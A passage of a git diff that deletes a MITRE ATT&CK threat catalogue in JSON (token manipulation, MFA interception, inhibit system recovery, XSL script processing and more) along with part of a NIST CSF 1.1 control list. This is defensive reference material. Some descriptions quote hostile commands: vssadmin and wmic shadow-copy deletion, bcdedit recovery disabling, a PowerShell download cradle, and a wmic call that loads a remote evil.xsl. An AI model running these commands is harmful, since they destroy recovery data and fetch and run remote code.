system.(Citation: Pentestlab Token Manipulation)\n\nAny standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.\nhttps://attack.mitre.org/techniques/T1134\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1111 - Multi-Factor Authentication Interception", - "description": "Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users\u2019 phones.(Citation: Okta Scatter Swine 2022)\nhttps://attack.mitre.org/techniques/T1111\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1136 - Create Account", - "description": "Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\n\nAccounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.\nhttps://attack.mitre.org/techniques/T1136\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1526 - Cloud Service Discovery", - "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.\n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nFor example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)\n\nAdversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable Cloud Logs](https://attack.mitre.org/techniques/T1562/008).\nhttps://attack.mitre.org/techniques/T1526\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1018 - Remote System Discovery", - "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039).\n\nAdversaries may also analyze data from local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.\n\nAdversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors, show arp).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)\nhttps://attack.mitre.org/techniques/T1018\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1046 - Network Service Discovery", - "description": "Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021) \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.\n\nWithin macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host\u2019s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)\nhttps://attack.mitre.org/techniques/T1046\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1518 - Software Discovery", - "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).\nhttps://attack.mitre.org/techniques/T1518\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1538 - Cloud Service Dashboard", - "description": "An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)\n\nDepending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.\nhttps://attack.mitre.org/techniques/T1538\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1622 - Debugger Evasion", - "description": "Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)\n\nDebugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.\n\nSpecific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would \u201cswallow\u201d or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)\n\nAdversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW().(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)\nhttps://attack.mitre.org/techniques/T1622\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1052 - Exfiltration Over Physical Medium", - "description": "Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.\nhttps://attack.mitre.org/techniques/T1052\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1105 - Ingress Tool Transfer", - "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)\n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)\nhttps://attack.mitre.org/techniques/T1105\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1648 - Serverless Execution", - "description": "Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. \n\nAdversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation: Cado Security Denonia) Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to a serverless cloud function, which may then be able to perform actions the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Rhingo Security Labs GCP Privilege Escalation)\n\nServerless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.(Citation: Backdooring an AWS account) Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)\nhttps://attack.mitre.org/techniques/T1648\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1484 - Domain Policy Modification", - "description": "Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.\n\nWith sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).\n\nAdversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.\nhttps://attack.mitre.org/techniques/T1484\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1220 - XSL Script Processing", - "description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)\n\n* msxsl.exe customers[.]xml script[.]xsl\n* msxsl.exe script[.]xsl script[.]xsl\n* msxsl.exe script[.]jpeg script[.]jpeg\n\nAnother variation of this technique, dubbed \u201cSquiblytwo\u201d, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n\n* Local File: wmic process list /FORMAT:evil[.]xsl\n* Remote File: wmic os get /FORMAT:\u201dhttps[:]//example[.]com/evil[.]xsl\u201d\nhttps://attack.mitre.org/techniques/T1220\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1587 - Develop Capabilities", - "description": "Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)\n\nAs with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.\nhttps://attack.mitre.org/techniques/T1587\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1008 - Fallback Channels", - "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.\nhttps://attack.mitre.org/techniques/T1008\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1124 - System Time Discovery", - "description": "An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time)(Citation: Technet Windows Time Service)\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\\\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.(Citation: Technet Windows Time Service)\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)\nhttps://attack.mitre.org/techniques/T1124\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1556 - Modify Authentication Process", - "description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).\n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.\nhttps://attack.mitre.org/techniques/T1556\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1495 - Firmware Corruption", - "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.\n\nIn general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485).\nhttps://attack.mitre.org/techniques/T1495\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1490 - Inhibit System Recovery", - "description": "Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.\n\nOperating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete\n* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet\n* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no\n* REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system\n\nOn network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.\n\nAdversaries may also delete \u201conline\u201d backups that are connected to their network \u2013 whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)\nhttps://attack.mitre.org/techniques/T1490\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1216 - System Script Proxy Execution", - "description": "Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)\nhttps://attack.mitre.org/techniques/T1216\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1211 - Exploitation for Defense Evasion", - "description": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.\nhttps://attack.mitre.org/techniques/T1211\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1127 - Trusted Developer Utilities Proxy Execution", - "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.\nhttps://attack.mitre.org/techniques/T1127\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1529 - System Shutdown/Reboot", - "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)\n\nShutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)\nhttps://attack.mitre.org/techniques/T1529\n", - "provider": "MITRE ATT&CK" - } - } - ] -} \ No newline at end of file diff --git a/library/libraries/nist_measures.json b/library/libraries/nist_measures.json deleted file mode 100644 index f1d22be..0000000 --- a/library/libraries/nist_measures.json +++ /dev/null @@ -1,981 +0,0 @@ -{ - "locale": "en", - "name": "NIST CSF 1.1 - Security functions", - "description": "Security functions inspired from NIST CSF 1.1", - "format_version": "1.0", - "Copyright": "https://www.nist.gov/open/license", - "objects": [ - { - "type": "security_function", - "fields": { - "name": "ID.AM-1", - "description": "Physical devices and systems within the organization are inventoried.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.AM-2", - "description": "Software platforms and applications within the organization are inventoried.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.AM-3", - "description": "Organizational communication and data flows are mapped.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.AM-4", - "description": "External information systems are catalogued.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.AM-5", - "description": "Resources (e.g., hardware, devices, data, time, personnel, and software) are prioritized based on their classification, criticality, and business value.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.AM-6", - "description": "Cybersecurity roles and responsibilities for the entire workforce and third-party stakeholders (e.g., suppliers, customers, partners) are established.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.BE-1", - "description": "The organization\u2019s role in the supply chain is identified and communicated.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.BE-2", - "description": "The organization\u2019s place in critical infrastructure and its industry sector is identified and communicated.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.BE-3", - "description": "Priorities for organizational mission, objectives, and activities are established and communicated.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.BE-4", - "description": "Dependencies and critical functions for delivery of critical services are established.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.BE-5", - "description": "Resilience requirements to support delivery of critical services are established for all operating states (e.g. under duress/attack, during recovery, normal operations).", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.GV-1", - "description": "Organizational cybersecurity policy is established and communicated.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.GV-2", - "description": "Cybersecurity roles and responsibilities are coordinated and aligned with internal roles and external partners.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.GV-3", - "description": "Legal and regulatory requirements regarding cybersecurity, including privacy and civil liberties obligations, are understood and managed.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.GV-4", - "description": "Governance and risk management processes address cybersecurity risks.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RA-1", - "description": "Asset vulnerabilities are identified and documented.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RA-2", - "description": "Cyber threat intelligence is received from information sharing forums and sources.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RA-3", - "description": "Threats, both internal and external, are identified and documented.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RA-4", - "description": "Potential business impacts and likelihoods are identified.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RA-5", - "description": "Threats, vulnerabilities, likelihoods, and impacts are used to determine risk.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RA-6", - "description": "Risk responses are identified and prioritized.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RM-1", - "description": "Risk management processes are established, managed, and agreed to by organizational stakeholders.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RM-2", - "description": "Organizational risk tolerance is determined and clearly expressed.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RM-3", - "description": "The organization\u2019s determination of risk tolerance is informed by its role in critical infrastructure and sector specific risk analysis.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.SC-1", - "description": "Cyber supply chain risk management processes are identified, established, assessed, managed, and agreed to by organizational stakeholders.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.SC-2", - "description": "Suppliers and third party partners of information systems, components, and services are identified, prioritized, and assessed using a cyber supply chain risk assessment process.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.SC-3", - "description": "Contracts with suppliers and third-party partners are used to implement appropriate measures designed to meet the objectives of an organization\u2019s cybersecurity program and Cyber Supply Chain Risk Management Plan.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.SC-4", - "description": "Suppliers and third-party partners are routinely assessed using audits, test results, or other forms of evaluations to confirm they are meeting their contractual obligations.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.SC-5", - "description": "Response and recovery planning and testing are conducted with suppliers and third-party providers.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AC-1", - "description": "Identities and credentials are issued, managed, verified, revoked, and audited for authorized devices, users and processes.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AC-2", - "description": "Physical access to assets is managed and protected.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AC-3", - "description": "Remote access is managed.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AC-4", - "description": "Access permissions and authorizations are managed, incorporating the principles of least privilege and separation of duties.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AC-5", - "description": "Network integrity is protected (e.g., network segregation, network segmentation).", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AC-6", - "description": "Identities are proofed and bound to credentials and asserted in interactions.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AC-7", - "description": "Users, devices, and other assets are authenticated (e.g., single-factor, multi-factor) commensurate with the risk of the transaction (e.g., individuals\u2019 security and privacy risks and other organizational risks).", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - 